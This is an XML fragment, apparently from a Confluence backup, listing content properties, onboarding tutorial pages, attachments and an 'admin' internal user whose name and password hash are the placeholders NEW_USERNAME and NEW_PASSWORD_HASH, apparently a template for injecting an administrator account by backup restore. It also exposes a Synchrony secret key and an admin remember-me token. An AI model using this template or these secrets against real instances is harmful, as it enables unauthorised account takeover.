<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262154</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">5</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262153</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">6</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262152</id>
|
||||
<property name="name"><![CDATA[macroNames]]></property>
|
||||
<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262151</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">7</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262150</id>
|
||||
<property name="name"><![CDATA[macro-count.widget]]></property>
|
||||
<property name="stringValue"><![CDATA[9-2]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262149</id>
|
||||
<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
|
||||
<property name="stringValue"/><property name="longValue">14</property>
|
||||
<property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262148</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[c6887e71-b34a-4cf8-b4d4-36b53ff35592]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262147</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[881dbc25-a20d-4773-b5a8-2a402abcfd9d]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262146</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[34cd463c-b2be-49e6-9006-62679d6a59f1]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="ContentProperty" package="com.atlassian.confluence.content">
|
||||
<id name="id">262145</id>
|
||||
<property name="name"><![CDATA[share-id]]></property>
|
||||
<property name="stringValue"><![CDATA[8b24739b-eaaa-404e-8897-e347c68f3974]]></property>
|
||||
<property name="longValue"/><property name="dateValue"/></object>
|
||||
<object class="Secrets" package="com.atlassian.synchrony">
|
||||
<id name="key"><![CDATA[Synchrony-0fccd6a4-3e18-398a-8fe4-ff41cdd6c7ad-debug]]></id>
|
||||
<property name="value"><![CDATA[ZmUL2wyLlx8ROyTY/satsTeR2J61ADRUqTnTe8Ai1og=]]></property>
|
||||
</object>
|
||||
<object class="ConfluenceRememberMeToken" package="com.atlassian.confluence.user.persistence.dao">
|
||||
<id name="id">622593</id>
|
||||
<property name="username"><![CDATA[admin]]></property>
|
||||
<property name="createdTime">1699509859137</property>
|
||||
<property name="token"><![CDATA[d24ab7e045f654b651978d7fb48f0ce945461128]]></property>
|
||||
</object>
|
||||
<object class="InternalUserAttribute" package="com.atlassian.crowd.model.user">
|
||||
<id name="id">557060</id>
|
||||
<property name="user" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
|
||||
</property>
|
||||
<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
|
||||
</property>
|
||||
<property name="name"><![CDATA[lastAuthenticated]]></property>
|
||||
<property name="value"><![CDATA[1699509892791]]></property>
|
||||
<property name="lowerValue"><![CDATA[1699509892791]]></property>
|
||||
</object>
|
||||
<object class="InternalUserAttribute" package="com.atlassian.crowd.model.user">
|
||||
<id name="id">557059</id>
|
||||
<property name="user" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
|
||||
</property>
|
||||
<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
|
||||
</property>
|
||||
<property name="name"><![CDATA[passwordLastChanged]]></property>
|
||||
<property name="value"><![CDATA[1699509858738]]></property>
|
||||
<property name="lowerValue"><![CDATA[1699509858738]]></property>
|
||||
</object>
|
||||
<object class="InternalUserAttribute" package="com.atlassian.crowd.model.user">
|
||||
<id name="id">557058</id>
|
||||
<property name="user" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
|
||||
</property>
|
||||
<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
|
||||
</property>
|
||||
<property name="name"><![CDATA[invalidPasswordAttempts]]></property>
|
||||
<property name="value"><![CDATA[0]]></property>
|
||||
<property name="lowerValue"><![CDATA[0]]></property>
|
||||
</object>
|
||||
<object class="InternalUserAttribute" package="com.atlassian.crowd.model.user">
|
||||
<id name="id">557057</id>
|
||||
<property name="user" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
|
||||
</property>
|
||||
<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
|
||||
</property>
|
||||
<property name="name"><![CDATA[requiresPasswordChange]]></property>
|
||||
<property name="value"><![CDATA[false]]></property>
|
||||
<property name="lowerValue"><![CDATA[false]]></property>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98306</id>
|
||||
<property name="hibernateVersion">37</property>
|
||||
<property name="title"><![CDATA[Share your page with a team member (step 9 of 9)]]></property>
|
||||
<property name="lowerTitle"><![CDATA[share your page with a team member (step 9 of 9)]]></property>
|
||||
<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163845</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196614</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196617</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196619</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196620</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262151</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262165</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.780</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98343</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position">8</property>
|
||||
<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98305</id>
|
||||
<property name="hibernateVersion">24</property>
|
||||
<property name="title"><![CDATA[Tell people what you think in a comment (step 8 of 9)]]></property>
|
||||
<property name="lowerTitle"><![CDATA[tell people what you think in a comment (step 8 of 9)]]></property>
|
||||
<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163847</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="outgoingLinks" class="java.util.Collection"><element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196615</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196618</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196622</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196623</id>
|
||||
</element>
|
||||
<element class="OutgoingLink" package="com.atlassian.confluence.links"><id name="id">196626</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262161</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262164</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.784</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<collection name="attachments" class="java.util.Collection"><element class="Attachment" package="com.atlassian.confluence.pages"><id name="id">98344</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position">7</property>
|
||||
<property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98310</id>
|
||||
<property name="hibernateVersion">11</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262180</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.788</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98309</id>
|
||||
<property name="hibernateVersion">11</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262186</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.792</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98308</id>
|
||||
<property name="hibernateVersion">16</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262174</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.804</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98307</id>
|
||||
<property name="hibernateVersion">16</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262176</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.879</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="InternalUser" package="com.atlassian.crowd.model.user">
|
||||
<id name="id">491521</id>
|
||||
<property name="name"><![CDATA[NEW_USERNAME]]></property>
|
||||
<property name="lowerName"><![CDATA[NEW_USERNAME_LOWER]]></property>
|
||||
<property name="active">true</property>
|
||||
<property name="createdDate">2023-11-09 06:04:18.716</property>
|
||||
<property name="updatedDate">2023-11-09 06:04:18.716</property>
|
||||
<property name="firstName"><![CDATA[]]></property>
|
||||
<property name="lowerFirstName"><![CDATA[]]></property>
|
||||
<property name="lastName"><![CDATA[admin]]></property>
|
||||
<property name="lowerLastName"><![CDATA[admin]]></property>
|
||||
<property name="displayName"><![CDATA[admin]]></property>
|
||||
<property name="lowerDisplayName"><![CDATA[admin]]></property>
|
||||
<property name="emailAddress"><![CDATA[admin@test.com]]></property>
|
||||
<property name="lowerEmailAddress"><![CDATA[admin@test.com]]></property>
|
||||
<property name="externalId"><![CDATA[d1c26bc5-04d3-4c31-b230-c9454e51186d]]></property>
|
||||
<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
|
||||
</property>
|
||||
<component name="credential"><property name="credential" type="string"><![CDATA[NEW_PASSWORD_HASH]]></property>
|
||||
</component>
|
||||
<collection name="credentialRecords" class="java.util.List"><element class="InternalUserCredentialRecord" package="com.atlassian.crowd.model.user"><id name="id">524289</id>
|
||||
</element>
|
||||
</collection>
|
||||
<collection name="attributes" class="java.util.Set"><element class="InternalUserAttribute" package="com.atlassian.crowd.model.user"><id name="id">557058</id>
|
||||
</element>
|
||||
<element class="InternalUserAttribute" package="com.atlassian.crowd.model.user"><id name="id">557060</id>
|
||||
</element>
|
||||
<element class="InternalUserAttribute" package="com.atlassian.crowd.model.user"><id name="id">557057</id>
|
||||
</element>
|
||||
<element class="InternalUserAttribute" package="com.atlassian.crowd.model.user"><id name="id">557059</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98330</id>
|
||||
<property name="hibernateVersion">14</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262172</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.895</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98341</id>
|
||||
<property name="hibernateVersion">18</property>
|
||||
<property name="title"><![CDATA[step05-04.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step05-04.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262254</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262255</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262256</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262260</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">3</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98329</id>
|
||||
<property name="hibernateVersion">14</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262170</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.903</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98342</id>
|
||||
<property name="hibernateVersion">18</property>
|
||||
<property name="title"><![CDATA[home.jpg]]></property>
|
||||
<property name="lowerTitle"><![CDATA[home.jpg]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262204</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262223</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262230</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98328</id>
|
||||
<property name="hibernateVersion">10</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262187</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.909</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98339</id>
|
||||
<property name="hibernateVersion">16</property>
|
||||
<property name="title"><![CDATA[step-2-image-5.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step-2-image-5.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262209</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262212</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262213</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262243</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">2</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98327</id>
|
||||
<property name="hibernateVersion">13</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262190</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.915</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98340</id>
|
||||
<property name="hibernateVersion">19</property>
|
||||
<property name="title"><![CDATA[step06-image03.png]]></property>
|
||||
<property name="lowerTitle"><![CDATA[step06-image03.png]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262211</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262214</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262224</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262244</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">2</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98321</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98334</id>
|
||||
<property name="hibernateVersion">14</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262169</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.921</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98345</id>
|
||||
<property name="hibernateVersion">17</property>
|
||||
<property name="title"><![CDATA[home.jpg]]></property>
|
||||
<property name="lowerTitle"><![CDATA[home.jpg]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262226</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262229</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262242</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98333</id>
|
||||
<property name="hibernateVersion">13</property>
|
||||
<property name="title"/><property name="lowerTitle"/><collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262192</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:51.927</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[draft]]></property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
<property name="position"/><property name="parent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="ancestors" class="java.util.List"><element class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</element>
|
||||
</collection>
|
||||
</object>
|
||||
<object class="Attachment" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98346</id>
|
||||
<property name="hibernateVersion">19</property>
|
||||
<property name="title"><![CDATA[Confluence-Origami-Necktie.jpeg]]></property>
|
||||
<property name="lowerTitle"><![CDATA[confluence-origami-necktie.jpeg]]></property>
|
||||
<collection name="contentProperties" class="java.util.Collection"><element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262222</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262239</id>
|
||||
</element>
|
||||
<element class="ContentProperty" package="com.atlassian.confluence.content"><id name="id">262240</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="version">1</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="versionComment"><![CDATA[]]></property>
|
||||
<property name="contentStatus"><![CDATA[current]]></property>
|
||||
<property name="containerContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
|
||||
</property>
|
||||
<property name="space" class="Space" package="com.atlassian.confluence.spaces"><id name="id">131073</id>
|
||||
</property>
|
||||
</object>
|
||||
<object class="Page" package="com.atlassian.confluence.pages">
|
||||
<id name="id">98332</id>
|
||||
<property name="hibernateVersion">71</property>
|
||||
<property name="title"><![CDATA[Get serious with a table (step 5 of 9)]]></property>
|
||||
<property name="lowerTitle"><![CDATA[get serious with a table (step 5 of 9)]]></property>
|
||||
<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163846</id>
|
||||
</element>
|
||||
</collection>
|
||||
